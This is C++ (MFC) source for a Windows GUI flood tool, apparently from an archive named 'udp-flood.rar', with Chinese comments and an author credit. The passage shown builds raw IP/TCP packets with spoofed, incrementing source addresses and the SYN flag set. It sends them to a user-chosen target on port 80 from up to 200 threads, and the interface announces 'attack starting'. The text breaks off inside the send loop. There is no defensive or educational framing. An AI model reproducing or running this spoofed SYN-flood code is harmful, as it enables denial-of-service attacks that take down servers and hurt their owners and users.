udp-flood.rar_ udp flood_udp flood_udpflood

// floodDlg.cpp : implementation file // #include "stdafx.h" #include "flood.h" #include "floodDlg.h" #ifdef _DEBUG #define new DEBUG_NEW #undef THIS_FILE static char THIS_FILE[] = __FILE__; #endif volatile int g_maxThread=0; DWORD g_dwDestIP=0; DWORD g_dwFakeIP=0; ///////////////////////////////////////////////////////////////////////////// // CFloodDlg dialog CFloodDlg::CFloodDlg(CWnd* pParent /*=NULL*/) : CDialog(CFloodDlg::IDD, pParent) { //{{AFX_DATA_INIT(CFloodDlg) m_strInfo = _T("==============\r\n作者：独孤寒哮\r\nQQ:23923886\r\nE-mail:blode@peoplemail.com.cn\r\n==============\r\n红一工作室\r\nhttp://10years.169dns.net"); m_nThread = 1; //}}AFX_DATA_INIT // Note that LoadIcon does not require a subsequent DestroyIcon in Win32 m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME); m_bStart=FALSE; m_dwThreadId.RemoveAll(); } void CFloodDlg::DoDataExchange(CDataExchange* pDX) { CDialog::DoDataExchange(pDX); //{{AFX_DATA_MAP(CFloodDlg) DDX_Control(pDX, IDC_EDIT_INFO, m_editInfo); DDX_Control(pDX, IDC_IPADDRESS_FAKEIP, m_fakeIP); DDX_Control(pDX, IDC_IPADDRESS_DESTIP, m_destIP); DDX_Text(pDX, IDC_EDIT_INFO, m_strInfo); DDX_Text(pDX, IDC_EDIT_THREAD, m_nThread); DDV_MinMaxInt(pDX, m_nThread, 1, 200); //}}AFX_DATA_MAP } BEGIN_MESSAGE_MAP(CFloodDlg, CDialog) //{{AFX_MSG_MAP(CFloodDlg) ON_WM_PAINT() ON_WM_QUERYDRAGICON() //}}AFX_MSG_MAP END_MESSAGE_MAP() ///////////////////////////////////////////////////////////////////////////// // CFloodDlg message handlers BOOL CFloodDlg::OnInitDialog() { CDialog::OnInitDialog(); // Set the icon for this dialog. The framework does this automatically // when the application's main window is not a dialog SetIcon(m_hIcon, TRUE); // Set big icon SetIcon(m_hIcon, FALSE); // Set small icon m_fakeIP.SetAddress(1,10,1,1); return TRUE; // return TRUE unless you set the focus to a control } // If you add a minimize button to your dialog, you will need the code below // to draw the icon. For MFC applications using the document/view model, // this is automatically done for you by the framework. void CFloodDlg::OnPaint() { if (IsIconic()) { CPaintDC dc(this); // device context for painting SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), 0); // Center icon in client rectangle int cxIcon = GetSystemMetrics(SM_CXICON); int cyIcon = GetSystemMetrics(SM_CYICON); CRect rect; GetClientRect(&rect); int x = (rect.Width() - cxIcon + 1) / 2; int y = (rect.Height() - cyIcon + 1) / 2; // Draw the icon dc.DrawIcon(x, y, m_hIcon); } else { CDialog::OnPaint(); } } // The system calls this to obtain the cursor to display while the user drags // the minimized window. HCURSOR CFloodDlg::OnQueryDragIcon() { return (HCURSOR) m_hIcon; } USHORT checksum(USHORT *buffer, int size) //校验函数 { unsigned long cksum=0; while(size >1) { cksum+=*buffer++; size -=sizeof(USHORT); } if(size ) { cksum += *(UCHAR*)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } void CFloodDlg::OnOK() { if(!m_bStart){ UpdateData(TRUE); if(m_nThread>200||m_nThread<1) { AfxMessageBox("线程数必须在1-200之间，不要开得太多了。"); return; } DWORD dstIP; m_destIP.GetAddress(dstIP); g_dwDestIP=dstIP; m_fakeIP.GetAddress(dstIP); g_dwFakeIP=dstIP; /* in_addr in; in.S_un.S_addr=g_dwFakeIP; CString s; s=inet_ntoa(in); in.S_un.S_addr=ntohl(g_dwFakeIP); s=inet_ntoa(in); //dstIP++; in.S_un.S_addr=ntohl(dstIP+1); s=inet_ntoa(in); in.S_un.S_addr=htonl(dstIP+1); s=inet_ntoa(in); */ m_bStart=TRUE; CString str; GetDlgItem(IDC_IPADDRESS_DESTIP)->EnableWindow(FALSE); GetDlgItem(IDC_IPADDRESS_FAKEIP)->EnableWindow(FALSE); GetDlgItem(IDC_EDIT_THREAD)->EnableWindow(FALSE); GetDlgItem(IDOK)->SetWindowText("停止"); GetDlgItem(IDOK)->EnableWindow(FALSE); str.Format("攻击开始...\r\n正在启动线程...\r\n==============\r\n"); m_editInfo.SetSel(0,-1); m_editInfo.ReplaceSel(str); for(int t=0;t<m_nThread;t++){ AfxBeginThread(FloodThread,this); } } else{ m_bStart=!m_bStart; //str.Format(); m_editInfo.SetSel(-1,-1); m_editInfo.ReplaceSel("攻击停止...\r\n正在终止线程...\r\n==============\r\n"); //UpdateData(FALSE); StopThread(); } } void CFloodDlg::StopThread() //停止线程 { GetDlgItem(IDOK)->SetWindowText("开始"); GetDlgItem(IDOK)->EnableWindow(FALSE); for(int t=0;t<m_dwThreadId.GetSize();t++){ PostThreadMessage(m_dwThreadId.GetAt(t),WM_STOP,0,0); } } void CFloodDlg::OnCancel() { StopThread(); CDialog::OnCancel(); } UINT FloodThread(LPVOID lParam) { CFloodDlg *pDlg=static_cast<CFloodDlg*>(lParam); CString erStr; DWORD t=GetCurrentThreadId(); pDlg->m_dwThreadId.Add(t); //get current thread id,and add to m_dwthreadid g_maxThread++; if(g_maxThread>=pDlg->m_nThread){ //在所以线程启动后，再启用“停止”按钮 pDlg->GetDlgItem(IDOK)->EnableWindow(TRUE); } erStr.Format("线程:%ld，已经启动.\r\n",t); pDlg->m_editInfo.SetSel(-1,-1); pDlg->m_editInfo.ReplaceSel(erStr); SOCKET sock; int to=2000,sendSeq=1; char buf[128]={0}; sockaddr_in sin; IP_HEADER ipHdr; TCP_HEADER tcpHdr; PSD_HEADER psdHdr; if((sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,0,0,WSA_FLAG_OVERLAPPED))==INVALID_SOCKET){ erStr.Format("线程:%ld，WSASocket失败，代码:%d\r\n",t,WSAGetLastError()); pDlg->m_editInfo.SetSel(-1,-1); pDlg->m_editInfo.ReplaceSel(erStr); g_maxThread--; return -1; } int flag=1; //设置自填充IP头 if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(const char *)&flag,sizeof(flag))==SOCKET_ERROR){ erStr.Format("线程:%ld，setsockopt失败，代码:%d\r\n",t,WSAGetLastError()); pDlg->m_editInfo.SetSel(-1,-1); pDlg->m_editInfo.ReplaceSel(erStr); g_maxThread--; return -1; } //设置发送超时 if(setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,(const char *)&to,sizeof(to))==SOCKET_ERROR){ erStr.Format("线程:%ld，setsockopt失败，代码:%d\r\n",t,WSAGetLastError()); pDlg->m_editInfo.SetSel(-1,-1); pDlg->m_editInfo.ReplaceSel(erStr); g_maxThread--; return -1; } sin.sin_family=AF_INET; sin.sin_addr.s_addr=g_dwDestIP; //填充IP首部 ipHdr.h_verlen=(4<<4 | sizeof(ipHdr)/sizeof(unsigned long)); //高四位IP版本号，低四位首部长度 ipHdr.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); //16位总长度（字节） ipHdr.ident=1; //16位标识 ipHdr.frag_and_flags=0; //3位标志位 ipHdr.ttl=128; //8位生存时间TTL ipHdr.proto=IPPROTO_TCP; //8位协议(TCP,UDP…) ipHdr.checksum=0; //16位IP首部校验和 ipHdr.sourceIP=htonl(g_dwFakeIP+sendSeq); //32位源IP地址 ipHdr.destIP=htonl(g_dwDestIP)/*inet_addr("218.75.161.220")*/; //32位目的IP地址 /* in_addr in; in.S_un.S_addr=ipHdr.sourceIP; CString s; s=inet_ntoa(in); */ //填充TCP首部 tcpHdr.th_sport=htons(6026); //源端口号 tcpHdr.th_dport=htons(80); //目的端口号 tcpHdr.th_seq=htonl(sendSeq); //SYN序列号 tcpHdr.th_ack=0; //ACK序列号置为0 tcpHdr.th_lenres=(sizeof(TCP_HEADER)/4<<4|0); //TCP长度和保留位 tcpHdr.th_flag=2; //SYN 标志 tcpHdr.th_win=htons(16384); //窗口大小 tcpHdr.th_urp=0; //偏移 tcpHdr.th_sum=0; //校验和 //填充TCP伪首部（用于计算校验和，并不真正发送） psdHdr.saddr=ipHdr.sourceIP; //源地址 psdHdr.daddr=ipHdr.destIP; //目的地址 psdHdr.mbz=0; psdHdr.ptcl=IPPROTO_TCP; //协议类型 psdHdr.tcpl=htons(sizeof(tcpHdr)); //TCP首部长度 MSG msg; while(1){ if(::PeekMessage(&msg,0,WM_STOP,WM_STOP,PM_NOREMOVE)){ break; } memcpy(buf,&psdHdr,sizeof(psdHdr)); memcpy(buf+sizeof(psdHdr),&tcpHdr,sizeof(tcpHdr)); tcpHdr.th_sum=checksum((USHORT *)buf,sizeof(psdHdr)+sizeof(tcpHdr)); memcpy(buf,&ipHdr,sizeof(ipHdr)); memcpy(buf+sizeof(ipHdr),&tcpHdr,sizeof(tcpHdr));